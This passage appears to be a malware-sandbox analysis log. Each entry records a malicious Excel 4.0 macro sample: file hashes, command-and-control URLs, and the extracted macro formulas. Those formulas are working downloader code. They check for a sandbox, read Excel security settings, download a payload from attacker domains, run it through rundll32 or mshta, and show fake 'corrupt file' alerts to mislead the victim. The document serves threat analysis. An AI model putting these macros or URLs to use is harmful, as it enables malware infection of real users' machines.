946178cd4cf8832158c958cfb8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"138ff7e3a35ffd6e89185e3bc3c42911079dfbfbbafbf365a9dd12f82b547a8b"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"138ff7e3a35ffd6e89185e3bc3c42911079dfbfbbafbf365a9dd12f82b547a8b","filesize":226304,"md5":"19b2f88ec939bf2f325ed80888900ca6","sha1":"0d2398fa1bdd330cccb97f5fa888f3e49a42aacf","sha256":"138ff7e3a35ffd6e89185e3bc3c42911079dfbfbbafbf365a9dd12f82b547a8b","sha512":"a06fa8e44fdb17996c55234558704b749e92bd3057a93f4ad9e5c6ea07e40d396f035e706f4458525f41faaaa9348cb51a377a469e47861bcc7fc393ba726fd5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"138ff7e3a35ffd6e89185e3bc3c42911079dfbfbbafbf365a9dd12f82b547a8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0ID8EiNJ6R\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1397203de397a9a0a6ea8ed984586a9e4ef3eea381617e06fb8936357d269cdf"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"1397203de397a9a0a6ea8ed984586a9e4ef3eea381617e06fb8936357d269cdf","filesize":141824,"md5":"c5f851eedd1b0f8a9c1e638b53a53a7d","sha1":"f5831c0af5ddcf8bc9914f10c9958933b70b9482","sha256":"1397203de397a9a0a6ea8ed984586a9e4ef3eea381617e06fb8936357d269cdf","sha512":"1a859a569ac6615779b4741acd0b8af727cdbba59ce8b4dd55a419cb3ad2dc9b23d8360b9184f5049a22f12edaca1a7138f79b8ed295c94aae8ec598c5f8e418","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1397203de397a9a0a6ea8ed984586a9e4ef3eea381617e06fb8936357d269cdf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"6BaQc8FMgs\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13d5dcfec1117c299203c31b9dcf60422b1a9e7e3674ae63cef7efed1c0add48"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13d5dcfec1117c299203c31b9dcf60422b1a9e7e3674ae63cef7efed1c0add48","filesize":171008,"md5":"0ea92dac88a0d219987fa9e6b48d1c0b","sha1":"81f490ac8aa311a6a39182a57c2b884b040099cc","sha256":"13d5dcfec1117c299203c31b9dcf60422b1a9e7e3674ae63cef7efed1c0add48","sha512":"c8200adb2567c6a8b99a2ed1f2f494ae6e8cc657e2a80b6bf524bd02775c96c10023a8222cf29b3193db4d08b222bd0a7b6c42272b2355f3117a0693c196c034","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13d5dcfec1117c299203c31b9dcf60422b1a9e7e3674ae63cef7efed1c0add48.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"adL2VcveOL\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13efe5025e77016bd8e62a0d13b8ad22b46aefd2b027c640db207c2b19e3a5c8"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13efe5025e77016bd8e62a0d13b8ad22b46aefd2b027c640db207c2b19e3a5c8","filesize":206336,"md5":"af428946ebbe0c64e63ae3b9b14f78ac","sha1":"7e9da92e611882944089432048263591d089d875","sha256":"13efe5025e77016bd8e62a0d13b8ad22b46aefd2b027c640db207c2b19e3a5c8","sha512":"6c88f72cbd505ed69cb40fe56742e658c7a71072901324f5ca7620d89eb22f743fdf8886f728968e57dc22e19e51669278d69ce91b782322e0dead52ae2c117b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13efe5025e77016bd8e62a0d13b8ad22b46aefd2b027c640db207c2b19e3a5c8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"os8jVObxWl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13f4ce38250b2d7627f8930282d2670a64bc281db5f1f5cbb0cb531ed07647e9"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13f4ce38250b2d7627f8930282d2670a64bc281db5f1f5cbb0cb531ed07647e9","filesize":152576,"md5":"49be3e83489583b6d4cb7a133f8ed472","sha1":"e670349e0758b4f26340cb64dd3a19cf8e283c28","sha256":"13f4ce38250b2d7627f8930282d2670a64bc281db5f1f5cbb0cb531ed07647e9","sha512":"a1725a763f8350a22795bec83d0835488aa0b4a3c5f44db14d9e0d35278256e18af19b224e8977009e07777e98ef88c2b5788d31dda65f0a65ce582f0ae0b06c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13f4ce38250b2d7627f8930282d2670a64bc281db5f1f5cbb0cb531ed07647e9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8z8MGvc6W0\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13f7eb3f9a2ec853417d340f0d1492aa4a973daf4e95f76234f0d6e9e7a327e2"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"13f7eb3f9a2ec853417d340f0d1492aa4a973daf4e95f76234f0d6e9e7a327e2","filesize":726528,"md5":"4c0bf8f8386a9bbfb504c7bff2df9826","sha1":"f8b50539f413f4c74d834b88a8f16cfcd3be01ed","sha256":"13f7eb3f9a2ec853417d340f0d1492aa4a973daf4e95f76234f0d6e9e7a327e2","sha512":"900cf2fe7305f35d97e8317d81a803b188202213b3adceac2318de22422ff7f96a87eba4f937e0ca641b1b3d03d0a41a0cb5ac71eadf5f71bbac1aae24bdda6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13f7eb3f9a2ec853417d340f0d1492aa4a973daf4e95f76234f0d6e9e7a327e2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(R$65531C$41,\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(R$65531C$41,\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13fb304a755eb6b0d817e8176a126e7a526db915799d7c361bb0dfc425213739"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13fb304a755eb6b0d817e8176a126e7a526db915799d7c361bb0dfc425213739","filesize":116224,"md5":"cc239226de823c28799ae8be93bf5af6","sha1":"a3e8309d1d808ed752a3c4d4eda25f862e1e3928","sha256":"13fb304a755eb6b0d817e8176a126e7a526db915799d7c361bb0dfc425213739","sha512":"a1c8b81cc79b4590b50ed6d7a7160fbd38292b7666fb159a24398326e2ec512a8635a3ff9e93e21eb367fd3e1d245d401e4c66e80d7bdac2452c8851e92d3d82","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13fb304a755eb6b0d817e8176a126e7a526db915799d7c361bb0dfc425213739.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GfevwHuIRn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13fe43b26418269c3c71166a1da705eb9ef02f8d9609a1be415c96637446d23c"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13fe43b26418269c3c71166a1da705eb9ef02f8d9609a1be415c96637446d23c","filesize":168960,"md5":"454b540c1d998f2864628904a5302dd2","sha1":"6f4ea0bfd5592439ec2a3f3f63746ba4283dabe1","sha256":"13fe43b26418269c3c71166a1da705eb9ef02f8d9609a1be415c96637446d23c","sha512":"86be70abe9de9abb0f2e21dec6702501007503815501008fc2efe19f9e5b0b6f8e252cfa66ace77d1900534c9160235fa4d4328a6ca18e013c9ea14a5d607046","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13fe43b26418269c3c71166a1da705eb9ef02f8d9609a1be415c96637446d23c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GXElQxNwgm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14002be270a10456e0f9417dfb1f0c5c39254ca227a69a8b1d6de8c6e320b70c"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14002be270a10456e0f9417dfb1f0c5c39254ca227a69a8b1d6de8c6e320b70c","filesize":152576,"md5":"0e22273fe6d8d739c4ae84d9e4d32f8f","sha1":"86a95befea2acdd188f3792d9944c96ab2fece79","sha256":"14002be270a10456e0f9417dfb1f0c5c39254ca227a69a8b1d6de8c6e320b70c","sha512":"ea4f04d61f8dd5eb2f16ca56c7d900070a4cc3ec78508eb8bbd190588dbbf4b7125f08b26e92f3f03cd1eaa77faf49aa5deb6817588bad986e3b3e7799fb8519","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14002be270a10456e0f9417dfb1f0c5c39254ca227a69a8b1d6de8c6e320b70c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dRRlPo3grn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"140048ba08d57b91e70bde6be8ff1aebe4c3a225f7a1f656a810e3a829de5633"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"140048ba08d57b91e70bde6be8ff1aebe4c3a225f7a1f656a810e3a829de5633","filesize":116224,"md5":"910a578e3276e9a1480226db4d188575","sha1":"95cd14c6b4fcf33676eac673fed80c2aea50b4de","sha256":"140048ba08d57b91e70bde6be8ff1aebe4c3a225f7a1f656a810e3a829de5633","sha512":"b7ad1e77d4792c1edb1b6e7fb741923267336beef0ced4d00d4f37daab6e8580f3822ddf8c1aca2917bfaee696cdfcad8c235dcb0ff3571312e17e23f365c65a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"140048ba08d57b91e70bde6be8ff1aebe4c3a225f7a1f656a810e3a829de5633.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RKX3ZhwYfy\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14024877d5238ac6c72b8d0063e95a03710ec573d5acb0ffefdcc986a5438dd9"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14024877d5238ac6c72b8d0063e95a03710ec573d5acb0ffefdcc986a5438dd9","filesize":167424,"md5":"f39e66338b55bbf0ef4b1d343af91071","sha1":"c1cb9e8815737f3fe76ac05d8609c9a05e433cbd","sha256":"14024877d5238ac6c72b8d0063e95a03710ec573d5acb0ffefdcc986a5438dd9","sha512":"f5968785f531544804812408a0df13aa70ea68ee1dbb964f32649f96ca156a66456b91ac951888fc2cde39c91b603ef43aa4fdcafc1549fc63fcfaa7d1bd8c23","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14024877d5238ac6c72b8d0063e95a03710ec573d5acb0ffefdcc986a5438dd9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"UJkRuXlRDB\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1405e96e4b071e3a520544443dd33a34897b6837a5cdf149012593e41d257d5c"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"1405e96e4b071e3a520544443dd33a34897b6837a5cdf149012593e41d257d5c","filesize":104448,"md5":"f6c907a830ce3ec95cd104a915d84576","sha1":"4b8858cc77e58d8530fdb7c29f4ba8de1ffb61f0","sha256":"1405e96e4b071e3a520544443dd33a34897b6837a5cdf149012593e41d257d5c","sha512":"f0af12fc89920f8e89b4dc0e554bfe330cf4c605e3df578f22895abc07b3a5569441b85b719e31b034a5f898d771f454e28435b3342f69019206869187f853b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1405e96e4b071e3a520544443dd33a34897b6837a5cdf149012593e41d257d5c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"TQ9OosiYl2\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14214ccc32f59e27005d221d84483002a12676d85b3527d7e6d473456f63b42f"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14214ccc32f59e27005d221d84483002a12676d85b3527d7e6d473456f63b42f","filesize":193024,"md5":"2cfc13f6c33192aded655eaae23fa272","sha1":"e497253ecdb8804959f0de291867214323412c75","sha256":"14214ccc32f59e27005d221d84483002a12676d85b3527d7e6d473456f63b42f","sha512":"c78ab4af81ff2bb8a20383d81f69733447db059dcd4797dcb64b0b31e9cb03504f4313e18390c556ff3a79d75e2dd8a60a020765170e01147d23e052493818d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14214ccc32f59e27005d221d84483002a12676d85b3527d7e6d473456f63b42f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/4L4JW25H\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"142bdb889b02dfd437c9c29fbe4ad97e364e9c49371e9c3a07358af8c8211349"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"142bdb889b02dfd437c9c29fbe4ad97e364e9c49371e9c3a07358af8c8211349","filesize":104448,"md5":"6b0caeda06ab1589aa297c0382c1d4a6","sha1":"7e831cd77e4acdc835d3a60ef117b2202cb34854","sha256":"142bdb889b02dfd437c9c29fbe4ad97e364e9c49371e9c3a07358af8c8211349","sha512":"dbe0aa6c8e30b9846654b19fd5e39445355e200c4df5136617385cf3f607bbdf398f5817a71f3d29b4f5d332081bc646157d2814b9926080878ce3d9de35ca5c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"142bdb889b02dfd437c9c29fbe4ad97e364e9c49371e9c3a07358af8c8211349.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"YFLi7WEfoz\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"143ce801670b8e6cdb94e6f4186b2629be664947a5601cb890f9ef44c3966d75"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"143ce801670b8e6cdb94e6f4186b2629be664947a5601cb890f9ef44c3966d75","filesize":206336,"md5":"8a677b55e121d4bb13baf56959649b43","sha1":"ec0c6a77359459a1d00bad06b2700894fb885a46","sha256":"143ce801670b8e6cdb94e6f4186b2629be664947a5601cb890f9ef44c3966d75","sha512":"ea0ebd21ee21def6cc5bfb903d647ed2a82e88c78d6cc71b97e0d56d079b8c0c086cfc039282e0f4c5ee0f488faedb4b9b2c437fa4de7265f829bb53fab68f5a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"143ce801670b8e6cdb94e6f4186b2629be664947a5601cb890f9ef44c3966d75.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 